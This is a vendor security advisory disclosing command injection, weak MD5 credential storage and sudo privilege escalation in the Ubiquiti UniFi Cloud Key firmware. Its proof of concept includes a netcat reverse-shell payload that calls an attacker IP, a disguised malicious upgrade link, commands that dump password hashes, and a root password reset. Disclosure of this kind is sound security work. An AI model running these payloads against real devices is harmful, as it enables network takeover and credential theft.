Ubiquiti Networks UniFi Cloud Key multiple critical vulnerabilities

Project Description

The Ubiquitit UniFi Cloud Key is prone to command injection in the administrative interface. When an attacker lure a user to upgrade the firmware with a faked update link, the attacker can take over the device and the attached access points. In addition, the cloud user account password can be cracked.


 

Vendor description

“Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets.”

Source: http://ir.ubnt.com/

 

Business recommendation

SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.

 

Vulnerability overview/description

 

1) Authenticated Command Injection & Cloud User Weak Crypto

The manual UniFi Cloud Key firmware upgrade function is prone to a command injection vulnerability which can be exploited for example by sending a manipulated upgrade link to a victim.

A reverse-shell can be used to get access to the device and this allows an attacker to get access to the internal network of the attacked user. The web user is “www-data” which has only few access and execution rights but by exploiting vulnerability 2) it is possible to gain root access on the device!

After a successful command injection the cloud user account password hash can be dumped. Since the UniFi Cloud Key has to communicate with the access points and configure their passwords as well, a hash has to be stored at another place than /etc/shadow to persist the keys on the devices. The hashes are stored in “system.cfg” using only MD5 hashing algorithm which can be cracked easily in reasonable time.

This configuration file consists the username and the password hash of the cloud user which is the same on all access points and the UniFi Cloud Key.

This configuration can be read by the user “www-data”. Afterwards, the hash can be cracked and the cloud user is hijacked. A remote-configuration of the wireless lan of the user is now possible for an attacker.

 

2) Privilege Escalation

The password of the root user can be changed by a lower privileged user on the device. This is possible because some binaries can be executed with sudo by this user without the root password.

 

Proof of concept

 

1) Authenticated Command Injection & Cloud-User Hash Leak

The following PHP snipplet is responsible for the command execution:

(api.inc, line 476)

exec(CMD_WGET . $url . CMD_WGET_OPTIONS, $out, $rc);
return CMD_WGET . $url . CMD_WGET_OPTIONS;
}
[...]

The following link opens a reverse-shell:

;busybox nc <Attacker-IP> <Attacker-Port> -e /bin/bash;

To ‘hide’ the command from the eyes of the user in the upgrade window, one can also decorate the link:

;busybox nc 192.168.3.142 8999 -e /bin/bash; https://secconsult.build-1337.bin

As listener, netcat was used:

$ nc -lvp <Attacker-Port>

To hijack the cloud account, steal username and password hash:

(user: www-data)
$ cd /srv/unifi/data/devices/uap/
$ ls
<serial-number-of-an-ap>
$ cd <serial-number-of-an-ap>
$ cat system.cfg | grep "users\.1\.name"
users.1.name=<username>
$ cat system.cfg | grep "users\.1\.password"
users.1.password=<password>

The root password hash in /etc/shadow is SHA-512 hashed, but in system.cfg the same password is just MD5 hashed and can be cracked easily in reasonable time.

 

2) Privilege Escalation

Because of the following line in /etc/sudoers.d/cloudkey-webui one can elevate the rights of www-data to root:

(cloudkey-webui, line 1)

www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, /usr/sbin/service unifi *, /usr/bin/java

With the following commands one can change the root password without actually knowing it:

(user: www-data)
$ cd /tmp
$ echo "root:password" > newfile.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < newfile.txt

The root password is now changed to ‘password’.

SSH login is also possible:

$ ssh root@<IP-Address>

 

Vulnerable / tested versions

Ubiquiti Networks UniFi Cloud Key version 0.5.9/0.6.0 has been tested. This version was the latest at the time the security vulnerabilities were discovered.

 

Vendor contact timeline

2017-02-03: Contacting vendor via HackerOne.
2017-02-05: Providing PoC video via HackerOne.
2017-02-06: Vendor sets status to “Triaged”.
2017-02-21: Asking for a status update; No answer.
2017-03-01: Inform the vendor that the advisory will be published at
2017-03-27; No answer.
2017-03-17: Asking for a status update.
2017-03-20: Vendor states that fix will be available in v0.6.1.
2017-03-21: Asking vendor when the update will be available. Found update on vendor homepage (available since 2017-03-20).
2017-03-21: Vendor asks for more time. Set release date to 2017-06-25.
2017-03-27: Fixed version is available – provide at least 90 days for customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date to 2017-06-27.
2017-06-26: Shifted publication date back to 2017-07-27 to provide more for customers to apply the patch.
2017-07-27: Public release of security advisory

 

Solution

Upgrade to firmware v0.6.1 or later.

 

Workaround

None

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

 

EOF T. Weber / @2017

 

Project Details

  • TitleSEC Consult Vulnerability Lab Security Advisory < 20170727-0 > Authenticated Command Injection & Cloud User Weak Crypto & Privilege Escalation
  • ProductUbiquiti Networks UniFi Cloud Key
  • Vulnerable versionFirmware v0.5.9/0.6.0
  • Fixed versionFirmware v0.6.1
  • CVE number--
  • ImpactCritical
  • Homepagehttps://www.ubnt.com
  • Found2017-01-31
  • ByT. Weber (Office Vienna) / SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Blog. Blog

Back